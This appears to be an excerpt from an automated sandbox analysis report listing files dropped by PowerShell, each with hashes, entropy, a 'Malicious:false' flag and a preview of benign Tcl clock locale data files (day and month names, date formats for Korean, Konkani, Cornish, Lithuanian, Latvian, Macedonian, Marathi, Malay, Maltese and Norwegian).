                                                                                                                                                                                                                      SSDEEP:48:43fMlylslXlslxl1hVuqLGuqqntH4xUyw9:2fKYqVq3f
                                                                                                                                                                                                                      MD5:CCB2C2254D3FA3025183DB7E010CAD66
                                                                                                                                                                                                                      SHA1:510BBB6A9162F2EF908E6561CC714848C2EA74CA
                                                                                                                                                                                                                      SHA-256:EF6FB319C398EEA79B3A951319F831F3B186D556565D17D738E5F9B4B77570F2
                                                                                                                                                                                                                      SHA-512:A0264565899BD1B0783ADC0388F893CCE713ADB23BDD63907CF092A74ACB4F7D3BE09DA29801E9C11A7B08CB1706E3771C598ACED351A0FCCBF4EBBD7871148D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ko DAYS_OF_WEEK_ABBREV [list \.. "\uc77c"\.. "\uc6d4"\.. "\ud654"\.. "\uc218"\.. "\ubaa9"\.. "\uae08"\.. "\ud1a0"].. ::msgcat::mcset ko DAYS_OF_WEEK_FULL [list \.. "\uc77c\uc694\uc77c"\.. "\uc6d4\uc694\uc77c"\.. "\ud654\uc694\uc77c"\.. "\uc218\uc694\uc77c"\.. "\ubaa9\uc694\uc77c"\.. "\uae08\uc694\uc77c"\.. "\ud1a0\uc694\uc77c"].. ::msgcat::mcset ko MONTHS_ABBREV [list \.. "1\uc6d4"\.. "2\uc6d4"\.. "3\uc6d4"\.. "4\uc6d4"\.. "5\uc6d4"\.. "6\uc6d4"\.. "7\uc6d4"\.. "8\uc6d4"\.. "9\uc6d4"\.. "10\uc6d4"\.. "11\uc6d4"\.. "12\uc6d4"\.. ""].. ::msgcat::mcset ko MONTHS_FULL [list \.. "1\uc6d4"\.. "2\uc6d4"\.. "3\uc6d4"\.. "4\uc6d4"\.. "5\uc6d4"\.. "6\uc6d4"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):354
                                                                                                                                                                                                                      Entropy (8bit):5.058233326545794
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo56SFZhjAo56m5Ys5o56TGMovBo56a/W3v6mfKo56TT+3+:4EnLB383g62vjV6m5Ysg6TG26a+3v6oo
                                                                                                                                                                                                                      MD5:58CA45CE26AF8ECA729BA72898BB633D
                                                                                                                                                                                                                      SHA1:CBBEDB7370890A1DB65080A359A9A5C164B525D5
                                                                                                                                                                                                                      SHA-256:4CAC8FB43D290A63A4D3215F22228B358AB4FA174F08712DD6C5B64C5E485071
                                                                                                                                                                                                                      SHA-512:48CCBD3F7B96D0998B6D1A1F8D7FE2B4B070BB5B8809FABE0A38209AEAF2E95E098292A5B9B5F0954E7729708A2173D32AAD70B6C0F336DB1E9BFA2968E6A56B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ko_KR BCE "\uae30\uc6d0\uc804".. ::msgcat::mcset ko_KR CE "\uc11c\uae30".. ::msgcat::mcset ko_KR DATE_FORMAT "%Y.%m.%d".. ::msgcat::mcset ko_KR TIME_FORMAT_12 "%P %l:%M:%S".. ::msgcat::mcset ko_KR DATE_TIME_FORMAT "%Y.%m.%d %P %l:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1997
                                                                                                                                                                                                                      Entropy (8bit):4.202940482570495
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83cm48Vc7VczMmDNVcYVcR0prdSmS68FeDJVcYVcR0prdSmS68FeuT:4354a+0prjS68mq0prjS68pT
                                                                                                                                                                                                                      MD5:67FA08F588A3B44D67E42EC1025013BC
                                                                                                                                                                                                                      SHA1:6895FEF0476DE0349895DB052B335AC46636B23A
                                                                                                                                                                                                                      SHA-256:9D215E31A39FED45B3657144E5F73C942E59E500036CE16B1FFF201FD6358595
                                                                                                                                                                                                                      SHA-512:4C2708BD9DD98320D3133EEFFD19A8018F49A36AB8348DB7C0B0287ADB4C052D3EFAD3686C8E46E0520F3CE27F361978272BA8752EB04E5A7BC07780398480DB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kok DAYS_OF_WEEK_FULL [list \.. "\u0906\u0926\u093f\u0924\u094d\u092f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u093e\u0930"\.. "\u092c\u0941\u0927\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset kok MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):260
                                                                                                                                                                                                                      Entropy (8bit):4.904340548436718
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo5VsNv+IZo5VsU3v6ry/5o5VsNo+3v+6f6HyFvn:4EnLB383gVsNvlAVsU3v6ry/gVsNF3vj
                                                                                                                                                                                                                      MD5:0AA20289A63BA3A14DCFED75EED980DE
                                                                                                                                                                                                                      SHA1:2B76013593D886B0724D82849FD1840B20922902
                                                                                                                                                                                                                      SHA-256:644F2B6D4BA27AF14891B781DEF60F708A9F18FC2F73566649B631A6DEA3EF09
                                                                                                                                                                                                                      SHA-512:6E13E0DC8BFD2ABE0D04B0BC098C40972F088F8D3D6ACA00338B17473ABC6F69840A88EC0C965C493B4270DEC777A0EA2D762BC33044EFE7030E437604EE201B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kok_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset kok_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset kok_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1013
                                                                                                                                                                                                                      Entropy (8bit):4.060027087416375
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83no1UwRlw4MAwBdc//3rpF6HFoot8:43vglHM7MTCHFs
                                                                                                                                                                                                                      MD5:CCEC7B77DCA1F6A406311FC43EE57030
                                                                                                                                                                                                                      SHA1:4ED329BB09A8F7C67F8984CD790E9B6819DE6F00
                                                                                                                                                                                                                      SHA-256:EAB468AC5BF1833D4F8CD658789413D4A46CAD16B63FB9B906CFF6DC9EA26251
                                                                                                                                                                                                                      SHA-512:4EFF6E49CC479A1BF0CEEAE256A1FAE7D4AE7D0ACE23CD87851471EC96BB5AF580C58A142E1B6CE72BC8B6BFF946A38801E681443B7DD9527A1DEB6E7EDD7D22
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kw DAYS_OF_WEEK_ABBREV [list \.. "Sul"\.. "Lun"\.. "Mth"\.. "Mhr"\.. "Yow"\.. "Gwe"\.. "Sad"].. ::msgcat::mcset kw DAYS_OF_WEEK_FULL [list \.. "De Sul"\.. "De Lun"\.. "De Merth"\.. "De Merher"\.. "De Yow"\.. "De Gwener"\.. "De Sadorn"].. ::msgcat::mcset kw MONTHS_ABBREV [list \.. "Gen"\.. "Whe"\.. "Mer"\.. "Ebr"\.. "Me"\.. "Evn"\.. "Gor"\.. "Est"\.. "Gwn"\.. "Hed"\.. "Du"\.. "Kev"\.. ""].. ::msgcat::mcset kw MONTHS_FULL [list \.. "Mys Genver"\.. "Mys Whevrel"\.. "Mys Merth"\.. "Mys Ebrel"\.. "Mys Me"\.. "Mys Evan"\.. "Mys Gortheren"\.. "Mye Est"\.. "Mys Gwyngala"\.. "Mys Hedra"\.. "Mys Du"\.. "Mys Kevardhu"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.959913054070712
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoh6AvMoh633v6ay/5oh6Ao+3vR6HyFvn:4EnLB38346AvR633v6ay/46AF3voSVn
                                                                                                                                                                                                                      MD5:18E8576F63B978F1AFEF15AC57B44FBF
                                                                                                                                                                                                                      SHA1:D50EB90944FF81E3CBFF942B16C1874EB7EA2562
                                                                                                                                                                                                                      SHA-256:EDAC14D929D1C6559EC46E9B460F8F44A189B78FB915F2D641104549CBD94188
                                                                                                                                                                                                                      SHA-512:F3DE5EE77BB889DA1353F9C9A1811083AB28BBEE4B7D6C8782F38B1AE44CF77565371A0E18F7E2BACD7EF590BC1215CA3E41AF929A15F60B3E85F6099A4CF378
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kw_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset kw_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset kw_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1307
                                                                                                                                                                                                                      Entropy (8bit):4.506235846178408
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83iHYuAMLzHYCaNu3d3nT15T31FhAlDgK/YrDZ/6Qz2C9kGPCveksvc:43iHFnHuUd3/T3xM/+SQCC9kGPEekKc
                                                                                                                                                                                                                      MD5:D4EC2E96995E0EB263F338DD16CC4F8D
                                                                                                                                                                                                                      SHA1:7ED86175489B1AE3CA5C0E8D42969F951C895D6B
                                                                                                                                                                                                                      SHA-256:855B652FCC8066BA45C7DC8DBFD3807D1B4759EA8D71C523567F47BF445D1DE6
                                                                                                                                                                                                                      SHA-512:A55E0D759A22360FF6668CEFAFFB812BABB316C447ADDB1FD5CDBC06AE1DA2E891E09952D073164C013AD9BF4184614102E7ADA553EEEFB2BBA26208B79B277F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lt DAYS_OF_WEEK_ABBREV [list \.. "Sk"\.. "Pr"\.. "An"\.. "Tr"\.. "Kt"\.. "Pn"\.. "\u0160t"].. ::msgcat::mcset lt DAYS_OF_WEEK_FULL [list \.. "Sekmadienis"\.. "Pirmadienis"\.. "Antradienis"\.. "Tre\u010diadienis"\.. "Ketvirtadienis"\.. "Penktadienis"\.. "\u0160e\u0161tadienis"].. ::msgcat::mcset lt MONTHS_ABBREV [list \.. "Sau"\.. "Vas"\.. "Kov"\.. "Bal"\.. "Geg"\.. "Bir"\.. "Lie"\.. "Rgp"\.. "Rgs"\.. "Spa"\.. "Lap"\.. "Grd"\.. ""].. ::msgcat::mcset lt MONTHS_FULL [list \.. "Sausio"\.. "Vasario"\.. "Kovo"\.. "Baland\u017eio"\.. "Gegu\u017e\u0117s"\.. "Bir\u017eelio"\.. "Liepos"\.. "Rugpj\u016b\u010dio"\.. "Rugs\u0117jo"\.. "Spa
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1271
                                                                                                                                                                                                                      Entropy (8bit):4.460631492946299
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83Amshb4mZdA7nl9kMmfpK269rkbi5vWm0W9ARivirXsv05vkn:430bHA7XRr95QWQQgaKkn
                                                                                                                                                                                                                      MD5:554ED2CAFD25F5F82DA54AE057F4BA98
                                                                                                                                                                                                                      SHA1:E25CDF0F9C4B523B5B05408E7820F7B4F627D19E
                                                                                                                                                                                                                      SHA-256:7E90D2008B220DB19C796C7107AD69D263B8AC8C7BDDFB879230699D978E9A0A
                                                                                                                                                                                                                      SHA-512:612201CCD64A51EC943921196D8C74D8BCA3AB3E35B0C9E91AE7F3A6B36F4F255AA9ADB3A254EC03629B01BD221B0B3F8CC4DFBFAC1F1718775E81CAD188AA86
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lv DAYS_OF_WEEK_ABBREV [list \.. "Sv"\.. "P"\.. "O"\.. "T"\.. "C"\.. "Pk"\.. "S"].. ::msgcat::mcset lv DAYS_OF_WEEK_FULL [list \.. "sv\u0113tdiena"\.. "pirmdiena"\.. "otrdiena"\.. "tre\u0161diena"\.. "ceturdien"\.. "piektdiena"\.. "sestdiena"].. ::msgcat::mcset lv MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maijs"\.. "J\u016bn"\.. "J\u016bl"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset lv MONTHS_FULL [list \.. "janv\u0101ris"\.. "febru\u0101ris"\.. "marts"\.. "apr\u012blis"\.. "maijs"\.. "j\u016bnijs"\.. "j\u016blijs"\.. "augusts"\.. "septembris"\.. "oktobris"\.. "novembris"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2157
                                                                                                                                                                                                                      Entropy (8bit):4.299300188052441
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:4389QMsGqdQfRQPjQmofqJp9sk5BstSpWQiQ3QJQ5QL39I0QRQTQ8Ql4J8W:2W8SMq+9sWINi2Kc9I0+gXF
                                                                                                                                                                                                                      MD5:888014F13A82511ABEF99497A753BFC3
                                                                                                                                                                                                                      SHA1:7F4231BEDE191370B37E8B917B6AD8829D15CA7D
                                                                                                                                                                                                                      SHA-256:4C0EB07F0FCB36DD12A3F7EDD6531616611ABF62BF7705B5A37CC59098221D5D
                                                                                                                                                                                                                      SHA-512:D748127CC615584901D35B6492EC566448B6C4DA6363858B5145921E9CD09490355CF4315F0F7A8542AA12790CD3432011A643A3A8F74B0119DB0DCE19FD68A4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0435\u0434."\.. "\u043f\u043e\u043d."\.. "\u0432\u0442."\.. "\u0441\u0440\u0435."\.. "\u0447\u0435\u0442."\.. "\u043f\u0435\u0442."\.. "\u0441\u0430\u0431."].. ::msgcat::mcset mk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0435\u043b\u0430"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0440\u0442\u043e\u043a"\.. "\u043f\u0435\u0442\u043e\u043a"\.. "\u0441\u0430\u0431\u043e\u0442\u0430"].. ::msgcat::mcset mk MONTHS_ABBREV [list \.. "\u0458\u0430\u043d."\.. "\u0444\u0435\u0432."\.. "\u043c\u0430\u0440."\.. "\u0430\u043f\u0440."\.. "\u043c\u0430\u0458."\.. "\u0458\u0443\u
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1846
                                                                                                                                                                                                                      Entropy (8bit):4.220147808639664
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR833cXh48Vc7VczfVczPmzNVcYVcR0prdSmS68FezUVcYVcR0prdSmS68FeoV:43K4S+0prjS68Yh0prjS68nV
                                                                                                                                                                                                                      MD5:07F99E0A05083B10F80A4D6867163B23
                                                                                                                                                                                                                      SHA1:B6036C7DA8043E3401583D03831E7A4BF755D93D
                                                                                                                                                                                                                      SHA-256:AE873BF5484EACBBE179913D43451BE53378FA701B5D81594D052266B8A09AF0
                                                                                                                                                                                                                      SHA-512:3A032C81B8FBFEE6EB66C1538CBD16329A1B393E4684B4E9B3FBCDD6344CE8AD34FA699F76EF953B3EB597D8E253345F54C2E92E7A43611C721038BCC2471EA2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset mr MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\u091f\u0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.89440333975705
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoGNv+IZoGU3v6ry/5oGNo+3v+6f6HyFvn:4EnLB383Zvlw3v6ry/ZF3vmSVn
                                                                                                                                                                                                                      MD5:67368E8A5715860BABD44E54A168192F
                                                                                                                                                                                                                      SHA1:7790D4B4B28FE5E38AB11CD037FFB826A8EB77FD
                                                                                                                                                                                                                      SHA-256:B7B1D379355A1D278E13EF557A887A662E84FB6A9B62B8E19A27927926270EF9
                                                                                                                                                                                                                      SHA-512:E95C90CFFA7CC4E61026FC328A4AA0BEE6A54A0061BA0B9459F9F0F4B008DD36F81BC9B8D8B964FA051FCEAB7FECE6D107CD456B3FD01A83B4900ECC3A0BCFA4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset mr_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset mr_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):957
                                                                                                                                                                                                                      Entropy (8bit):4.018924167342869
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383Zm/aufodZmt+JHEA7UVRosmAL/7Idzr43xRRosuL1PJHWZ6tHhHjv:4aR83ZsauSHJkA7umE/72UD21PJWZ0hT
                                                                                                                                                                                                                      MD5:7E6A943B7D82404F61BDBD95682073CD
                                                                                                                                                                                                                      SHA1:B96DBB1738F293D2842FDCEDF2DEF13004F77A8D
                                                                                                                                                                                                                      SHA-256:970B2F3ECC04980FCC2F9531CA6CE2BF36BC12942CB614BF70313B4CB0508985
                                                                                                                                                                                                                      SHA-512:12F5A5F7A170EE79D1F4398E96FF2DE84472027C5B5003DE7E86F46713E3F0997439E2EBA03FFB7DB611F0CE0E06EB149F5BD08ED2AA0409DB8348867487FFFD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms DAYS_OF_WEEK_ABBREV [list \.. "Aha"\.. "Isn"\.. "Sei"\.. "Rab"\.. "Kha"\.. "Jum"\.. "Sab"].. ::msgcat::mcset ms DAYS_OF_WEEK_FULL [list \.. "Ahad"\.. "Isnin"\.. "Selasa"\.. "Rahu"\.. "Khamis"\.. "Jumaat"\.. "Sabtu"].. ::msgcat::mcset ms MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mac"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ogos"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dis"\.. ""].. ::msgcat::mcset ms MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Mac"\.. "April"\.. "Mei"\.. "Jun"\.. "Julai"\.. "Ogos"\.. "September"\.. "Oktober"\.. "November"\.. "Disember"\.. ""]..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):265
                                                                                                                                                                                                                      Entropy (8bit):4.818053174805798
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoChFfluoChF+3v6xyFjoCh++3vflm68vn:4EnLB383xPflwe3v6gZl3vflm6+n
                                                                                                                                                                                                                      MD5:A02F11BE0DF920E63E7A3ACCE746E32D
                                                                                                                                                                                                                      SHA1:4A8B1EF1A6F8A5FD022042D6E009A01E4B0FEBD3
                                                                                                                                                                                                                      SHA-256:F5B859D8DD2A2B5F756E39B0DFEB26B95878D2F54BA3CE46C56F0F26CF2B554B
                                                                                                                                                                                                                      SHA-512:5F9AF8C89F491CB4C158ED73EA4CF32E6A83CF44A94DA6FE1A962C58199BF2348530F3DEFA0C6F433BA3ADEF81AE9B3884F30CD7A841B159D52F9F21008B4F92
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms_MY DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset ms_MY TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ms_MY DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):717
                                                                                                                                                                                                                      Entropy (8bit):4.55153350337982
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383VYmxWHWog4QUbxMmAMMiGZu+3v6ay/GK3vZsSVn:4aR83VYsxonQ2MmVVGRvjCGsvGSV
                                                                                                                                                                                                                      MD5:D8BBEC2F8935054E6081BB5E4AE8F7E3
                                                                                                                                                                                                                      SHA1:33FE6D51A284B8760BC6F442329B10374F506BDA
                                                                                                                                                                                                                      SHA-256:7DBC4E82D82FDE8CDF522FA10E082289D46B0C1A4A7D7A5FA83FF116677F052B
                                                                                                                                                                                                                      SHA-512:BF39C75DD6B3625897D7D44AC253AF5656CA21D0B394F78611584E2606CBC419C4A02353542D23393BEBCCF0CB4D861CDECD61AD89339F78C0260E966B495777
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \.. "\u0126ad"\.. "Tne"\.. "Tli"\.. "Erb"\.. "\u0126am"\.. "\u0120im"].. ::msgcat::mcset mt MONTHS_ABBREV [list \.. "Jan"\.. "Fra"\.. "Mar"\.. "Apr"\.. "Mej"\.. "\u0120un"\.. "Lul"\.. "Awi"\.. "Set"\.. "Ott"\.. "Nov"].. ::msgcat::mcset mt BCE "QK".. ::msgcat::mcset mt CE "".. ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y".. ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1209
                                                                                                                                                                                                                      Entropy (8bit):4.313626715960843
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83B0tSYuZrIsmYmPAxyIQ4HU92W16EL3Tvav31:43qhuZrIPAt04yTcF
                                                                                                                                                                                                                      MD5:42D02C3CAF28BE4994F27CEF5A183AB7
                                                                                                                                                                                                                      SHA1:DC411E8AC12C3D588AB2F3A3C95A75D8689AD402
                                                                                                                                                                                                                      SHA-256:534C5DACEF12F818FAF4ED806997A559F95D591F1B6236B0C30B07A107DD13F3
                                                                                                                                                                                                                      SHA-512:0BE27572106324FE2B6CDFF4513500DE7582AD1ABEF451FFC62B2050D3875A149DDDB66451E1B3F5BA9216268E9998D2A1C1E8343BBB9EF97947DA054B82818E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset nb MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nb MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nb BC
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1129
                                                                                                                                                                                                                      Entropy (8bit):4.235969198645435
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR837Ed+RxRMZZsmUmnZAEEHM92WFU5vtrvs:43AAHRMZZPnZALsCtt7s
                                                                                                                                                                                                                      MD5:B9B949794203D204628D4DBEA29587AE
                                                                                                                                                                                                                      SHA1:1642D8040144469B5C359E80693E68036F87B849
